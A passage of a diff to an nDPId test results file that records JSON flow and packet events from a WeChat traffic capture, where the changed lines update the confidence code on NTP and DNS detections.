+00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167849769,"flow_last_seen":1492167851204,"flow_idle_time":140000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip6","src_ip":"fe80::842:a3f3:a286:6c5b","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795090,"flow_last_seen":1492167795099,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.252","src_port":57401,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1492167788128,"flow_last_seen":1492167911211,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} 
+00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795091,"flow_last_seen":1492167795098,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":50440,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171164904,"flow_last_seen":1492171164904,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171164904,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.34","src_port":39207,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1492171164904,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171164904,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0HRVAAEAG2hjAqAFnX2UiIpknAFAjQjGZFOMj7IAQBf7IcQAAAQEICgA\/RIBwfIhZ"} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1556,"source":"wechat.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171166312,"flow_last_seen":1492171166312,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171166312,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":34996,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -508,7 +506,7 @@ 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1560,"source":"wechat.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1492171168104,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171168104,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0JkNAAEAG0OvAqAFnX2UiIYilAFA23DHngeAL9oAQBaSDAQAAAQEICgA\/R6Br6Xcq"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1561,"source":"wechat.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171169377,"flow_last_seen":1492171169377,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1492171169377,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"193.204.114.233","src_port":37578,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1561,"source":"wechat.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":1492171169377,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1492171169377,"pkt":"8IQvSpdgeJKcD6iOCABFEABMYzZAAEAR4JXAqAFnwcxy6ZLKAHsAOA7KIwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANybOCEWgBhs"} 
-00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1561,"source":"wechat.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171169377,"flow_last_seen":1492171169377,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1492171169377,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"193.204.114.233","src_port":37578,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} +00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1561,"source":"wechat.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171169377,"flow_last_seen":1492171169377,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1492171169377,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"193.204.114.233","src_port":37578,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} 
02086{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1562,"source":"wechat.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":2,"flow_last_seen":1492171171688,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1254,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1254,"pkt_l4_len":1220,"thread_ts_msec":1492171171688,"pkt":"8IQvSpdgeJKcD6iOCABFAATYpo1AAEAGahPAqAFny82XotOnAbtQhl2xjWp\/PoAYBaR4aAAAAQEICgA\/SyBF4BL0FwMDBJ8AAAAAAAAAk06IK7tTPaQ0tnXGeqHKil75lMj6OyIERVlvQ89pkJ\/5uFrYubJHeJqSrynvitkot5qunWtMUvVbyI8vjd8zycM9IsUAAB\/fKHCxwAngzbmC6gdk\/UoKTL4MIPiK4NVVPRz1DsYhuoql6sqmFMKJKaM6NXpyBkCtYpvlazDCWxllWCP\/i12XdKQQMbcGYN2wvAB3a6vg6oJPIx+XXkk4cY\/+EENsi+PDerl+pB2IlJMObTfaJBhM\/rJFUKMd1xriphMBzgM9PCE+gKKP\/k+AYg8NddY\/gnJX\/+unfAflhC1NZ1nFt2\/\/Y9gesYC0uhG0uLLlbtLmKF2MPjllgxHAEeq6L2rXw2szIJL4yllp+t9tcKCYfzVRzCQkgUtQQaP0YiRh1NQtDTvnuPpM8CS6YfFOx17PkSNzepokWNsrLXMtr9p2nc9zczirZ\/D9H9Xey3Xx0qFAN\/MVzWUXfWpSlTWrXzNWP5kDdvTYBf19VGMPfxtzLKYTLOd\/rVswJ6OAUsAdfTYAu7j6c4KJubGecouom8T9brd1TJm6pyXignKkiQR+nvp0U\/G\/NxhEcnKV91SvFM0mQxh+hfK10svoh9dj1Bq8+PvXaAQljscptiwRlr+X\/V1zPyapTZcrW9A2fGrnzKqVYJASiCPQWyYD8Mn6pda0e6knRW3Ae28WpLnmyjMKx4\/7dOqugSoKa3q7BQRxbcpbcOXlPFfrjt+CwbA3KCTzFvdocE4QeSDn8FuJ85HFummmQOxK7tDtjljV+L\/2nbiMgjTy6jJzYFwXGw6xLdoXOupF5XjIfHUSMeB+R0BhUmtVxXEWPPHfAVdVJcBt8uO5QMhp9jxrSrOX54VXB+P7Qj0VmSag75Jhz20k8Z3uI27cFcp7OjdlKhlEBtlzESNSQ8FGkqCxygPJSf0REdvr2uQA0ApTgzzF+s6YbdeH3vy1SJOH2fQsH4IeYeRjAPrh1RmlhN066XBLLeGtIiz1LEJx17TCB8c1JpUan\/1+JYoV0SCzXlaZWYybCxcBBIz\/2EdpG8hJzN4rtTVwf\/3OYFkhRTMbe1PHW9T5IfuTuKU76wWlDp+aujzjWp1vvFdq4bUrI6AdEquAU5C3BTnuLB9tqzlOb5nzcQjb4fPQCkUUcvHBPPLW9qrLyB05aTRG1W9ShnsibG\/AerW39YgPMVulkynnwtbGsYcGZs7KelCQXCLt3D6RU08N5SulLgw+o5aYItue0wJaW5VDEXxAVhsE4KU4+QsEuXkbd9rTsMt9Gf+Td49H8NzJEXxlYX\/ThtsZsn5doQpcdUcGVMiJrwpHQzTDWZLiBcd51axsLca9fP61xaeKb48j0Kb0TeXy0DcAfEDH4Sy29YAuNi7N4uKdxMrzHsqaQhCFI\/jmx6CqCWjy1zA6Ijzjpx6KTEeNxn3m7OTzuxckZQeS0ArKR7BX7UnCFIAenlvKt7e\/DzO9W1DndidXP+Qwf3XzvB+qv
enTl6HWA0XtGBky3MCwBE5b++HXnyFlygjOvbY7LPZovuQtASvUqwAHPkuONuar\/2ZEP2TwCB+AOJYrpZq+HLOc"} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1563,"source":"wechat.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171175912,"flow_last_seen":1492171175912,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171175912,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.131","src_port":58143,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1563,"source":"wechat.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":1,"flow_last_seen":1492171175912,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171175912,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0iE1AAEAGSqnAqAFn2DrNg+MfAbtA+v0fFZsbqIAQAT54MgAAAQEICgA\/T0Ay2r7t"} 
@@ -526,7 +524,7 @@ 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1572,"source":"wechat.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":2,"flow_last_seen":1492171176772,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171176772,"pkt":"8IQvSpdgeJKcD6iOCABFAAA00nlAAEAGJLTAqAFnX2UiIpk\/AFBMVGJQaE9vZoARBU64QQAAAQEICgA\/UBdwfJTZ"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1573,"source":"wechat.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171176772,"flow_last_seen":1492171176772,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171176772,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":58165,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1573,"source":"wechat.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":1,"flow_last_seen":1492171176772,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1492171176772,"pkt":"8IQvSpdgeJKcD6iOCABFAABE+U9AAEARvKPAqAFnwKgB\/uM1ADUAMHLoUUIBAAABAAAAAAAAB3dlYnB1c2gDd2ViBndlY2hhdANjb20AAAEAAQ=="} 
-00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1573,"source":"wechat.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171176772,"flow_last_seen":1492171176772,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171176772,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":58165,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"webpush.web.wechat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1573,"source":"wechat.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171176772,"flow_last_seen":1492171176772,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171176772,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":58165,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"webpush.web.wechat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1574,"source":"wechat.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":2,"flow_last_seen":1492171177004,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171177004,"pkt":"8IQvSpdgeJKcD6iOCABFAAA01BhAAEAGIxXAqAFnX2UiIpkbAFBTLvPZ9eqaX4ARCgvXsQAAAQEICgA\/UFFwfB+e"} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1575,"source":"wechat.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":3,"flow_last_seen":1492171177012,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171177012,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0HRdAAEAG2hbAqAFnX2UiIpknAFAjQjGaFOMj7IARBf68nAAAAQEICgA\/UFNwfIhZ"} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1576,"source":"wechat.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":3,"flow_last_seen":1492171177024,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171177024,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0\/7BAAEAG933AqAFnX2UiIYi0AFB\/4ffl18M9+4ARCyPk0AAAAQEICgA\/UFZr6XAp"} 
@@ -540,98 +538,98 @@ 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1590,"source":"wechat.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":2,"flow_last_seen":1492171177380,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171177380,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0e6BAAEAGnZvAqAFny82Tq+NyAbsh7o58Fu1nsYARAOW0WAAAAQEICgA\/UK9F3\/Tx"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1591,"source":"wechat.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171177429,"flow_last_seen":1492171177429,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171177429,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":43317,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1591,"source":"wechat.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":1,"flow_last_seen":1492171177429,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1492171177429,"pkt":"8IQvSpdgeJKcD6iOCABFAABE+fFAAEARvAHAqAFnwKgB\/qk1ADUAMHHYjFIBAAABAAAAAAAAB3dlYnB1c2gDd2ViBndlY2hhdANjb20AAAEAAQ=="} 
-00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1591,"source":"wechat.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171177429,"flow_last_seen":1492171177429,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171177429,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":43317,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"webpush.web.wechat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1591,"source":"wechat.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171177429,"flow_last_seen":1492171177429,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171177429,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":43317,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"webpush.web.wechat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1600,"source":"wechat.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":3,"flow_last_seen":1492171178268,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171178268,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0e6FAAEAGnZrAqAFny82Tq+NyAbsh7o58Fu1nsYARAOWzegAAAQEICgA\/UY1F3\/Tx"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1603,"source":"wechat.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171178741,"flow_last_seen":1492171178741,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171178741,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":56367,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1603,"source":"wechat.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":1,"flow_last_seen":1492171178741,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1492171178741,"pkt":"8IQvSpdgeJKcD6iOCABFAABE+rRAAEARuz7AqAFnwKgB\/twvADUAMPgq0wUBAAABAAAAAAAAB3dlYnB1c2gDd2ViBndlY2hhdANjb20AAAEAAQ=="} 
-00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1603,"source":"wechat.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171178741,"flow_last_seen":1492171178741,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171178741,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":56367,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"webpush.web.wechat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1603,"source":"wechat.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171178741,"flow_last_seen":1492171178741,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171178741,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":56367,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"webpush.web.wechat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1620,"source":"wechat.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":2,"flow_last_seen":1492171183746,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1492171183746,"pkt":"8IQvSpdgeJKcD6iOCABFAABE\/1xAAEARtpbAqAFnwKgB\/twvADUAMPgq0wUBAAABAAAAAAAAB3dlYnB1c2gDd2ViBndlY2hhdANjb20AAAEAAQ=="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1623,"source":"wechat.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171184747,"flow_last_seen":1492171184747,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171184747,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":33915,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1623,"source":"wechat.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":1,"flow_last_seen":1492171184747,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1492171184747,"pkt":"8IQvSpdgeJKcD6iOCABFAABEAC1AAEARtcbAqAFnwKgB\/oR7ADUAMLAAcuQBAAABAAAAAAAAB3dlYnB1c2gDd2ViBndlY2hhdANjb20AAAEAAQ=="} 
-00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1623,"source":"wechat.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171184747,"flow_last_seen":1492171184747,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171184747,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":33915,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"webpush.web.wechat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1623,"source":"wechat.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171184747,"flow_last_seen":1492171184747,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171184747,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":33915,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"webpush.web.wechat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
